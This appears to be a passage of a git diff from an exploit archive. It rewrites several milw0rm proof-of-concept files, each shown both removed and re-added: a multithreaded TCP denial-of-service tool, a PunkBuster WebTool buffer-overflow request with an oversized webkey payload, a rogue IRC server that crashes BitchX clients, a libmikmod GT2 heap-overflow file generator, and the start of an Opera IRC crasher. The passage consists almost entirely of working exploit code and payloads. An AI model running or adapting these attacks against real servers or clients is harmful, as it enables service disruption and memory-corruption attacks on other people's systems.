*)&dest,sizeof(dest)); - - if(con < 0) { - printf("\nsockz: Can`t connect to %s:%d\n",h,p); - close(desc); - exit(-1); - } - - thread_data[0].sock_pointer = desc; - thread_data[0].slp_pthread = slp_tmp; - - if((err = pthread_create(&close_them_all,NULL,(void*)&close_func,\ - (void*)&thread_data[0]) == -1)) { - printf("sockz: Can`t create thread\n"); - exit(-1); - } - -} - -char *resolver(char *hosttmp){ - - struct hostent *h; - - char *host; - - h = gethostbyname(hosttmp); - - if(!h) { - printf("resolver: Can`t resolve hostname %s\n",hosttmp); - exit(-1); - } - - host = inet_ntoa(*((struct in_addr *)h->h_addr_list[0])); - - return host; -} - - -int main(int ac, char **av) { - - if(ac<6) - usage(av[0]); - - int x, - y, - z, - err; - - char *hosttmp, - *port, - *host, - *slp; - - int sockets, - rounds, - slptime, - countdown; - - hosttmp = av[1]; - port = av[2]; - sockets = atoi(av[3]); - rounds = atoi(av[4]); countdown = rounds; - slp = av[5]; - slptime = atoi(slp); - - if(rounds<40) - usage(av[0]); - - host = resolver(hosttmp); - - pthread_t threads[rounds]; - - header(); - - printf("[!] Target: %s:%s\n",host,port); - printf("[!] Threads: %d for each round\n",sockets); - - for(z=0;z + * + * + * Description: TCP Denial Of Service Tool. panic-reloaded does + * not require large link or fast internet connection, + * it creates many pthreads, leaving openned connections + * to victim host. It is fast and an efficient way to + * deny a TCP service. + * + * Tested against SSH, FTP, HTTP. + * + * TTY1: + * hash@scarface:~$ gcc -lpthread panic-reloaded.c -o panic-reloaded -Wall + * hash@scarface:~$ ./panic-reloaded3 10.10.10.2 22 20 100 10 + * panic-reloaded.c + * written by hash + * [!] Target: localhost:443 + * [!] Threads: 20 for each round + * [*] Countdown: 40 | [!] 
Sleeping: 10s + * + * TTY2: + * hash@scarface:~$ ssh localhost + * ssh_exchange_identification: Connection closed by remote host + * hash@scarface:~$ + * + * + * Greets to folks from gotfault, rfdslabs, tripbit + * and to friends out there. +*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define AUTHOR "written by hash " + +void usage(char*); +void sockz(void*); +void header(); +void close_func(void *); +char *resolver(char*); + +struct pthread_args { + + char *host_pthread; + char *port_pthread; + char *slp_pthread; + +};struct pthread_args thread_data_array[1]; + +struct pthread_close { + + char *slp_pthread; + int sock_pointer; + +};struct pthread_close thread_data[0]; + +void usage(char *progname) { + + header(); + printf("Use: %s host port threads rounds sleep_time\n",progname); + printf("host: ip address or hostname\n"); + printf("port: victim port\n"); + printf("threads: number of threads\n"); + printf("rounds: number of reloads, min 40\n"); + printf("sleep_time: sleep time between each round\n"); + exit(0); + +} + +void header() { + + printf("panic-reloaded.c\n"); + printf("%s\n",AUTHOR); + +} + +void close_func(void *c) { + + struct pthread_close *my_close; + + char *slp_tmp; + int slp, + err, + sock_p; + + my_close = (struct pthread_close *) c; + slp_tmp = my_close->slp_pthread; + sock_p = my_close->sock_pointer; + + slp = atoi(slp_tmp); + + sleep(slp+1); + + if((err = close(sock_p)) < 0) { + printf("close_func: Can`t close socket\n"); + exit(-1); + } + + +} + +void sockz(void *t) { + + struct sockaddr_in dest; + struct pthread_args *my_data; + pthread_t close_them_all; + + char *h, + *p_tmp, + *slp_tmp; + + int p, + con, + err, + desc, + slp; + + my_data = (struct pthread_args *) t; + + h = my_data->host_pthread; + p_tmp = my_data->port_pthread; + slp_tmp = my_data->slp_pthread; + + p = atoi(p_tmp); + slp = atoi(slp_tmp); + + desc = socket(AF_INET,SOCK_STREAM,0); + + if((desc = 
socket(AF_INET,SOCK_STREAM,0)) < 0) { + perror("sockz: Can`t create socket\n"); + exit(-1); + } + + dest.sin_family = AF_INET; + dest.sin_port = htons(p); + dest.sin_addr.s_addr = inet_addr(h); + bzero(&(dest.sin_zero),8); + + con = connect(desc,(struct sockaddr *)&dest,sizeof(dest)); + + if(con < 0) { + printf("\nsockz: Can`t connect to %s:%d\n",h,p); + close(desc); + exit(-1); + } + + thread_data[0].sock_pointer = desc; + thread_data[0].slp_pthread = slp_tmp; + + if((err = pthread_create(&close_them_all,NULL,(void*)&close_func,\ + (void*)&thread_data[0]) == -1)) { + printf("sockz: Can`t create thread\n"); + exit(-1); + } + +} + +char *resolver(char *hosttmp){ + + struct hostent *h; + + char *host; + + h = gethostbyname(hosttmp); + + if(!h) { + printf("resolver: Can`t resolve hostname %s\n",hosttmp); + exit(-1); + } + + host = inet_ntoa(*((struct in_addr *)h->h_addr_list[0])); + + return host; +} + + +int main(int ac, char **av) { + + if(ac<6) + usage(av[0]); + + int x, + y, + z, + err; + + char *hosttmp, + *port, + *host, + *slp; + + int sockets, + rounds, + slptime, + countdown; + + hosttmp = av[1]; + port = av[2]; + sockets = atoi(av[3]); + rounds = atoi(av[4]); countdown = rounds; + slp = av[5]; + slptime = atoi(slp); + + if(rounds<40) + usage(av[0]); + + host = resolver(hosttmp); + + pthread_t threads[rounds]; + + header(); + + printf("[!] Target: %s:%s\n",host,port); + printf("[!] Threads: %d for each round\n",sockets); + + for(z=0;zMOV BYTE PTR SS:[ESP+1055],0 -0511B3BE FF96 54010000 CALL DWORD PTR DS:[ESI+154] -0511B3C4 8BBC24 64100000 MOV EDI,DWORD PTR SS:[ESP+1064] -... - -The ESI register is controlled by the attacker. -The memcpy function described above instead is located at offset -0512aea7. 
- -############################################################################## - -Send the following text file to the port on which is running PunkBuster - -POST /pbsvweb HTTP/1.1 - -webkey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccddddeeeeffff -cmds=Command Screen - -or simply build and use a link like the following: - - 
http://127.0.0.1:80/pbsvweb/plist=1&webkey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccddddeeeeffff - -# milw0rm.com [2006-05-23] + Luigi Auriemma + +############################################################################## + +Application: PunkBuster + http://www.punkbuster.com +Versions: PunkBuster for servers, versions minor than v1.229: + America's Army <= v1.228 + Battlefield 1942 <= v1.158 + Battlefield 2 <= v1.184 + Battlefield Vietnam <= v1.150 + Call of Duty <= v1.173 + Call of Duty 2 <= v1.108 + DOOM 3 <= v1.159 + Enemy Territory <= v1.167 + Far Cry <= v1.150 + F.E.A.R. 
<= v1.093 + Joint Operations <= v1.187 + Quake III Arena <= v1.150 + Quake 4 <= v1.181 + Rainbow Six 3: Raven Shield <= v1.169 + Rainbow Six 4: Lockdown <= v1.093 + Return to Castle Wolfenstein <= v1.175 + Soldier of Fortune II <= v1.183 +Platforms: Win32, Linux and Mac +Bug: buffer overflow in the built-in web server for the remote + server's administration (WebTool) +Exploitation: remote, versus server +Date: 23 May 2006 +Author: Luigi Auriemma + e-mail: aluigi@autistici.org + web: aluigi.org + +############################################################################## + +This web server is not enabled by default but must be activated +selecting the TCP port on which running the service using the command: +pb_sv_httpport PORT + +The authentication mechanism is handled through a parameter called +webkey followed by the password and sent by the client using the POST +method or directly in the URL. + +A webkey longer than 1024 bytes exploits a buffer-overflow which +happens when the program uses the memcpy function for copying the +attacker string in a limited buffer used for the comparison with the +valid service's password. + +The following is the code from the pbsv.dll 1.183 of the game Soldier +of Fortune II where happens the exception which interrupts the game: + +... +0511B3A8 8BB424 58100000 MOV ESI,DWORD PTR SS:[ESP+1058] +0511B3AF 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18] +0511B3B3 6A 41 PUSH 41 +0511B3B5 50 PUSH EAX +0511B3B6 C68424 55100000 >MOV BYTE PTR SS:[ESP+1055],0 +0511B3BE FF96 54010000 CALL DWORD PTR DS:[ESI+154] +0511B3C4 8BBC24 64100000 MOV EDI,DWORD PTR SS:[ESP+1064] +... + +The ESI register is controlled by the attacker. +The memcpy function described above instead is located at offset +0512aea7. 
+ +############################################################################## + +Send the following text file to the port on which is running PunkBuster + +POST /pbsvweb HTTP/1.1 + +webkey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccddddeeeeffff +cmds=Command Screen + +or simply build and use a link like the following: + + 
http://127.0.0.1:80/pbsvweb/plist=1&webkey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccddddeeeeffff + +# milw0rm.com [2006-05-23] diff --git a/platforms/multiple/dos/1937.html b/platforms/multiple/dos/1937.html index 8c4dc9124..08d10c8d5 100755 --- a/platforms/multiple/dos/1937.html +++ b/platforms/multiple/dos/1937.html @@ -25,5 +25,5 @@ Proof Of Concept DoS exploit:
boom - -# milw0rm.com [2006-06-21] + +# milw0rm.com [2006-06-21]
diff --git a/platforms/multiple/dos/1947.c b/platforms/multiple/dos/1947.c
index 89788a05a..a9f808356 100755
--- a/platforms/multiple/dos/1947.c
+++ b/platforms/multiple/dos/1947.c
@@ -1,90 +1,90 @@ -// BitchX (epic) =<1.1-final | do_hook() Boundary Check Error Remote DoS -///////////////////////////////////////////////////////////////////////// -// Federico L. Bossi Bonin -// fbossinetcommcomar - - -// #0 0x080a3fcc in BX_do_hook (which=9999999, format=0x8119077 "%s %s") at hook.c:865 -// #1 0x080d013b in numbered_command (from=0xbfbfe031 'A' , -// comm=-9999999, ArgList=0xbfbfd788) at numbers.c:1413 -// #2 0x080d7d02 in parse_server (orig_line=0xbfbfe030 ":", 'A' ...) at parse.c:1912 -// #3 0x080de3c2 in do_server (rd=0xbfbfe8a0, wr=0xbfbfe880) at server.c:584 -// #4 0x080b030f in BX_io (what=0x810b85a "main") at irc.c:1319 -// #5 0x080b09da in main (argc=6, argv=0xbfbfe9d4, envp=0xbfbfe9f0) at irc.c:1687 -// #6 0x0804aec2 in ___start () - -//greats to nitr0us, beck, gruba, samelat, ran, etc.. - -#include -#include -#include -#include - -#define PORT 6667 -#define LEN 100 - -int intalign=-999; //use negative number - -void sendbuff(int sock) { -char ptr[LEN]; -char buffer[2048]; -bzero(ptr,LEN); -bzero(buffer,2048); -memset(ptr,0x41,sizeof(ptr)-1); -sprintf(buffer,":%s %i %s %s\n",ptr,intalign,ptr,ptr); -write(sock,buffer,sizeof(buffer)); -} - -int main() { -struct sockaddr_in srv_addr, client; -int len,pid,sockfd,sock; - -sockfd = socket(AF_INET, SOCK_STREAM, 0); - -if (sockfd < 0) { -perror("error socket()"); -exit(1); -} - -bzero((char *) &srv_addr, sizeof(srv_addr)); -srv_addr.sin_family = AF_INET; -srv_addr.sin_addr.s_addr = INADDR_ANY; -srv_addr.sin_port = htons(PORT); - -if (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0) { -perror("error bind()"); -exit(1); -} - - -printf("BitchX (epic) =<1.1-final | do_hook() Boundary Check Error Remote DoS\n"); -printf("====================================================================\n"); -printf("Listening on port %i\n",PORT); - -listen(sockfd,5); -len = sizeof(client); - -while (1) { -sock = accept(sockfd, (struct sockaddr *) &client, &len); -if (sock < 0) { -perror("error 
accept()"); -exit(1); -} - -pid = fork(); -if (pid < 0) { -perror("fork()"); -exit(1); -} -if (pid == 0) { -close(sockfd); -printf("Conection from %s\n",inet_ntoa(client.sin_addr)); -sendbuff(sock); -exit(0); -} -else close(sock); -} -return 0; -} - -// milw0rm.com [2006-06-24] +// BitchX (epic) =<1.1-final | do_hook() Boundary Check Error Remote DoS +///////////////////////////////////////////////////////////////////////// +// Federico L. Bossi Bonin +// fbossinetcommcomar + + +// #0 0x080a3fcc in BX_do_hook (which=9999999, format=0x8119077 "%s %s") at hook.c:865 +// #1 0x080d013b in numbered_command (from=0xbfbfe031 'A' , +// comm=-9999999, ArgList=0xbfbfd788) at numbers.c:1413 +// #2 0x080d7d02 in parse_server (orig_line=0xbfbfe030 ":", 'A' ...) at parse.c:1912 +// #3 0x080de3c2 in do_server (rd=0xbfbfe8a0, wr=0xbfbfe880) at server.c:584 +// #4 0x080b030f in BX_io (what=0x810b85a "main") at irc.c:1319 +// #5 0x080b09da in main (argc=6, argv=0xbfbfe9d4, envp=0xbfbfe9f0) at irc.c:1687 +// #6 0x0804aec2 in ___start () + +//greats to nitr0us, beck, gruba, samelat, ran, etc.. 
+ +#include +#include +#include +#include + +#define PORT 6667 +#define LEN 100 + +int intalign=-999; //use negative number + +void sendbuff(int sock) { +char ptr[LEN]; +char buffer[2048]; +bzero(ptr,LEN); +bzero(buffer,2048); +memset(ptr,0x41,sizeof(ptr)-1); +sprintf(buffer,":%s %i %s %s\n",ptr,intalign,ptr,ptr); +write(sock,buffer,sizeof(buffer)); +} + +int main() { +struct sockaddr_in srv_addr, client; +int len,pid,sockfd,sock; + +sockfd = socket(AF_INET, SOCK_STREAM, 0); + +if (sockfd < 0) { +perror("error socket()"); +exit(1); +} + +bzero((char *) &srv_addr, sizeof(srv_addr)); +srv_addr.sin_family = AF_INET; +srv_addr.sin_addr.s_addr = INADDR_ANY; +srv_addr.sin_port = htons(PORT); + +if (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0) { +perror("error bind()"); +exit(1); +} + + +printf("BitchX (epic) =<1.1-final | do_hook() Boundary Check Error Remote DoS\n"); +printf("====================================================================\n"); +printf("Listening on port %i\n",PORT); + +listen(sockfd,5); +len = sizeof(client); + +while (1) { +sock = accept(sockfd, (struct sockaddr *) &client, &len); +if (sock < 0) { +perror("error accept()"); +exit(1); +} + +pid = fork(); +if (pid < 0) { +perror("fork()"); +exit(1); +} +if (pid == 0) { +close(sockfd); +printf("Conection from %s\n",inet_ntoa(client.sin_addr)); +sendbuff(sock); +exit(0); +} +else close(sock); +} +return 0; +} + +// milw0rm.com [2006-06-24] diff --git a/platforms/multiple/dos/1972.txt b/platforms/multiple/dos/1972.txt index 21cc472c1..8a7d0304b 100755 --- a/platforms/multiple/dos/1972.txt +++ b/platforms/multiple/dos/1972.txt @@ -1,28 +1,28 @@ - - - - - - - - - -# milw0rm.com [2006-07-01] + + + + + + + + + +# milw0rm.com [2006-07-01] diff --git a/platforms/multiple/dos/2073.c b/platforms/multiple/dos/2073.c index 2121f4d70..3924dd9c1 100755 --- a/platforms/multiple/dos/2073.c +++ b/platforms/multiple/dos/2073.c 
@@ -1,151 +1,151 @@
-/*
-
-by Luigi Auriemma
-
-*/
-
-#include
-#include
-#include
-#include
-
-
-
-#define VER "0.1"
-
-
-
-#define cpy(x,y) strncpy(x, y, sizeof(x));
-void fwi08(FILE *fd, int num);
-void fwi16(FILE *fd, int num);
-void fwi32(FILE *fd, int num);
-void fwstr(FILE *fd, uint8_t *str);
-void fwmem(FILE *fd, uint8_t *data, int size);
-void std_err(void);
-
-
-
-#pragma pack(1)
-
-typedef struct {
- uint8_t gt2[3];
- uint8_t version;
- uint32_t chunk_size;
- uint8_t module[32];
- uint8_t comments[160];
- uint8_t date_day;
- uint8_t date_month;
- uint16_t date_year;
- uint8_t tracker[24];
- uint16_t speed;
- uint16_t tempo;
- uint16_t volume;
- uint16_t voices;
- /* voices * 2 */
-} gt2_t;
-
-#pragma pack()
-
-
-
-int main(int argc, char *argv[]) {
- FILE *fd;
- gt2_t gt2;
- int i;
- char *fname;
-
- setbuf(stdout, NULL);
-
- fputs("\n"
- "libmikmod <= 3.2.2 and current CVS heap overflow with GT2 files "VER"\n"
- "by Luigi Auriemma\n"
- "e-mail: aluigi@autistici.org\n"
- "web: aluigi.org\n"
- "\n", stdout);
-
- if(argc < 2) {
- printf("\n"
- "Usage: %s \n"
- "\n", argv[0]);
- exit(1);
- }
-
- fname = argv[1];
-
- printf("- create file %s\n", fname);
- fd = fopen(fname, "wb");
- if(!fd) std_err();
-
- gt2.gt2[0] = 'G';
- gt2.gt2[1] = 'T';
- gt2.gt2[2] = '2';
- gt2.version = 4;
- gt2.chunk_size = 0; // unused
- cpy(gt2.module, "module_name");
- cpy(gt2.comments, "author");
- gt2.date_day = 1;
- gt2.date_month = 1;
- gt2.date_year = 2006;
- cpy(gt2.tracker, "tracker");
- gt2.speed = 6;
- gt2.tempo = 300;
- gt2.volume = 0;
- gt2.voices = 0;
-
- printf("- write GT2 header\n");
- fwrite(>2, sizeof(gt2), 1, fd);
- for(i = 0; i < gt2.voices; i++) fwi16(fd, 0);
-
- printf("- build the XCOM header for exploiting the heap overflow\n");
- fwmem(fd, "XCOM", 4);
- fwi32(fd, 0); // unused
- fwi32(fd, 0xffffffff); // bug here, 0xffffffff + 1 = 0
- fwstr(fd, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa");
-
- fclose(fd);
- printf("- finished\n");
-
return(0);
-}
-
-
-
-void fwi08(FILE *fd, int num) {
- fputc((num ) & 0xff, fd);
-}
-
-
-
-void fwi16(FILE *fd, int num) {
- fputc((num ) & 0xff, fd);
- fputc((num >> 8) & 0xff, fd);
-}
-
-
-
-void fwi32(FILE *fd, int num) {
- fputc((num ) & 0xff, fd);
- fputc((num >> 8) & 0xff, fd);
- fputc((num >> 16) & 0xff, fd);
- fputc((num >> 24) & 0xff, fd);
-}
-
-
-
-void fwstr(FILE *fd, uint8_t *str) {
- fputs(str, fd);
-}
-
-
-
-void fwmem(FILE *fd, uint8_t *data, int size) {
- fwrite(data, size, 1, fd);
-}
-
-
-
-void std_err(void) {
- perror("\nError");
- exit(1);
-}
-
-// milw0rm.com [2006-07-25]
+/*
+
+by Luigi Auriemma
+
+*/
+
+#include
+#include
+#include
+#include
+
+
+
+#define VER "0.1"
+
+
+
+#define cpy(x,y) strncpy(x, y, sizeof(x));
+void fwi08(FILE *fd, int num);
+void fwi16(FILE *fd, int num);
+void fwi32(FILE *fd, int num);
+void fwstr(FILE *fd, uint8_t *str);
+void fwmem(FILE *fd, uint8_t *data, int size);
+void std_err(void);
+
+
+
+#pragma pack(1)
+
+typedef struct {
+ uint8_t gt2[3];
+ uint8_t version;
+ uint32_t chunk_size;
+ uint8_t module[32];
+ uint8_t comments[160];
+ uint8_t date_day;
+ uint8_t date_month;
+ uint16_t date_year;
+ uint8_t tracker[24];
+ uint16_t speed;
+ uint16_t tempo;
+ uint16_t volume;
+ uint16_t voices;
+ /* voices * 2 */
+} gt2_t;
+
+#pragma pack()
+
+
+
+int main(int argc, char *argv[]) {
+ FILE *fd;
+ gt2_t gt2;
+ int i;
+ char *fname;
+
+ setbuf(stdout, NULL);
+
+ fputs("\n"
+ "libmikmod <= 3.2.2 and current CVS heap overflow with GT2 files "VER"\n"
+ "by Luigi Auriemma\n"
+ "e-mail: aluigi@autistici.org\n"
+ "web: aluigi.org\n"
+ "\n", stdout);
+
+ if(argc < 2) {
+ printf("\n"
+ "Usage: %s \n"
+ "\n", argv[0]);
+ exit(1);
+ }
+
+ fname = argv[1];
+
+ printf("- create file %s\n", fname);
+ fd = fopen(fname, "wb");
+ if(!fd) std_err();
+
+ gt2.gt2[0] = 'G';
+ gt2.gt2[1] = 'T';
+ gt2.gt2[2] = '2';
+ gt2.version = 4;
+ gt2.chunk_size = 0; // unused
+ cpy(gt2.module, "module_name");
+ cpy(gt2.comments, "author");
+ gt2.date_day
= 1;
+ gt2.date_month = 1;
+ gt2.date_year = 2006;
+ cpy(gt2.tracker, "tracker");
+ gt2.speed = 6;
+ gt2.tempo = 300;
+ gt2.volume = 0;
+ gt2.voices = 0;
+
+ printf("- write GT2 header\n");
+ fwrite(>2, sizeof(gt2), 1, fd);
+ for(i = 0; i < gt2.voices; i++) fwi16(fd, 0);
+
+ printf("- build the XCOM header for exploiting the heap overflow\n");
+ fwmem(fd, "XCOM", 4);
+ fwi32(fd, 0); // unused
+ fwi32(fd, 0xffffffff); // bug here, 0xffffffff + 1 = 0
+ fwstr(fd, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa");
+
+ fclose(fd);
+ printf("- finished\n");
+ return(0);
+}
+
+
+
+void fwi08(FILE *fd, int num) {
+ fputc((num ) & 0xff, fd);
+}
+
+
+
+void fwi16(FILE *fd, int num) {
+ fputc((num ) & 0xff, fd);
+ fputc((num >> 8) & 0xff, fd);
+}
+
+
+
+void fwi32(FILE *fd, int num) {
+ fputc((num ) & 0xff, fd);
+ fputc((num >> 8) & 0xff, fd);
+ fputc((num >> 16) & 0xff, fd);
+ fputc((num >> 24) & 0xff, fd);
+}
+
+
+
+void fwstr(FILE *fd, uint8_t *str) {
+ fputs(str, fd);
+}
+
+
+
+void fwmem(FILE *fd, uint8_t *data, int size) {
+ fwrite(data, size, 1, fd);
+}
+
+
+
+void std_err(void) {
+ perror("\nError");
+ exit(1);
+}
+
+// milw0rm.com [2006-07-25]
diff --git a/platforms/multiple/dos/2179.c b/platforms/multiple/dos/2179.c
index 50990c31d..f9d39680c 100755
--- a/platforms/multiple/dos/2179.c
+++ b/platforms/multiple/dos/2179.c
@@ -1,107 +1,107 @@
-/*
- * Opera 9 IRC client DOS exploit
- * by Preddy and NNP
- *
- * http://www.smashthestack.org
- * http://silenthack.co.uk
- * http://www.team-rootshell.com
- *
- * 12 August 2006
- *
- */
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#define MYPORT 6667
-
-#define BACKLOG 10
-
-// : KICK\r\n
-
-char die[] = {
- 0x3a, 0x20, 0x4b, 0x49, 0x43, 0x4b, 0x0d, 0x0a, 0x00 };
-
-void sigchld_handler(int s)
-{
- while(waitpid(-1, NULL, WNOHANG) > 0);
-}
-
-int main(void)
-{
- int sockfd, new_fd;
- struct sockaddr_in my_addr;
- struct sockaddr_in their_addr;
- socklen_t sin_size;
- struct sigaction sa;
- int yes=1;
-
- if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
- perror("socket");
- exit(1);
- }
-
- if (setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(int)) == -1) {
- perror("setsockopt");
- exit(1);
- }
-
- my_addr.sin_family = AF_INET;
- my_addr.sin_port = htons(MYPORT);
- my_addr.sin_addr.s_addr = INADDR_ANY;
- memset(&(my_addr.sin_zero), '\0', 8);
-
